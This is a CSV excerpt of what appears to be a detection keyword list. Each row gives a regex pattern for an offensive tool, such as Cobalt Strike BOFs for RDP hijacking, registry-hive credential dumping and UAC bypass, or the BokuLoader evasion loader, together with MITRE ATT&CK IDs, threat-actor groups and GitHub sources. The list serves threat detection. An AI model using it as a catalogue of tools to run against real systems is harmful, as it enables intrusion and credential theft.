"*bof-quser.cna*",".{0,1000}bof\-quser\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","36163"
"*bof-rdphijack*",".{0,1000}bof\-rdphijack.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","10","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","36164"
"*bof-rdphijack*",".{0,1000}bof\-rdphijack.{0,1000}","offensive_tool_keyword","RDPHijack-BOF","BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001","TA0002 - TA0003 - TA0004","N/A","N/A","Lateral Movement","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","N/A","N/A","3","298","46","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z","36165"
"*bof-regsave *",".{0,1000}bof\-regsave\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/BOF-RegSave","1","0","N/A","N/A","10","10","198","32","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z","36166"
"*BofRunnerOutput*",".{0,1000}BofRunnerOutput.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","36167"
"*BOFs*/SyscallsSpawn/*",".{0,1000}BOFs.{0,1000}\/SyscallsSpawn\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","36168"
"*Bofs/AssemblyLoader*",".{0,1000}Bofs\/AssemblyLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36169"
"*bof-servicemove *",".{0,1000}bof\-servicemove\s.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","36170"
"*bof-trustedpath-uacbypass*",".{0,1000}bof\-trustedpath\-uacbypass.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file implementation for trusted path UAC bypass. The target executable will be called without involving cmd.exe by using DCOM object.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/TrustedPath-UACBypass-BOF","1","1","N/A","N/A","10","10","133","40","2021-08-16T07:49:55Z","2021-08-07T03:40:33Z","36171"
"*bohops/WSMan-WinRM*",".{0,1000}bohops\/WSMan\-WinRM.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","36172"
"*boko.py *",".{0,1000}boko\.py\s.{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","0","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","36173"
"*bokoscanner.*",".{0,1000}bokoscanner\..{0,1000}","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/bashexplode/boko","1","1","N/A","N/A","N/A","1","71","13","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z","36174"
"*boku_pe_customMZ*",".{0,1000}boku_pe_customMZ.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36175"
"*boku_pe_customPE*",".{0,1000}boku_pe_customPE.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36176"
"*boku_pe_dll*",".{0,1000}boku_pe_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36177"
"*boku_pe_mask_*",".{0,1000}boku_pe_mask_.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36178"
"*boku_pe_MZ_from_C2Profile*",".{0,1000}boku_pe_MZ_from_C2Profile.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36179"
"*boku_strrep*",".{0,1000}boku_strrep.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","1","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","36180"
